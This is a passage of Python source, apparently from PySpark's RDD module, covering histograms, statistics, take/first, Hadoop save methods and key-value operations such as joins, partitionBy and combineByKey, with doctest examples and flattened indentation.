def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. Given the input values 1
and 50, we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
bucketing can be switched from an O(log n) insertion to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and using the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first parameter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
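# e.g. asking for num=100 when the first scanned partition yielded 10 items
# estimates int(1.5 * 100 * 1 / 10) - 1 = 14 partitions, which the cap then
# limits to partsScanned * 4 = 4 for the next round (illustrative note).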
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
try:
yield next(iterator)
except StopIteration:
return
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
The default partitioner is hash-partitioning.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
func = fail_on_stopiteration(func)
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a full outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# To avoid overly large objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
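# e.g. with numPartitions=8 the flush threshold starts at 80 buffered pairs and is
# then tuned adaptively below so that each serialized chunk stays roughly between
# 1MB and 10MB (illustrative note).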
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
        a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
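    # Illustrative usage (not part of the original doctests); a minimal sketch that assumes a
    # live SparkContext bound to `sc`, computing a per-key (sum, count) pair:
    #
    #   >>> rdd = sc.parallelize([("a", 1), ("a", 2), ("b", 3)])
    #   >>> seqFunc = lambda acc, v: (acc[0] + v, acc[1] + 1)          # merge a V into a U
    #   >>> combFunc = lambda u1, u2: (u1[0] + u2[0], u1[1] + u2[1])   # merge two U's
    #   >>> sorted(rdd.aggregateByKey((0, 0), seqFunc, combFunc).collect())
    #   [('a', (3, 2)), ('b', (3, 1))]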
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
    # TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
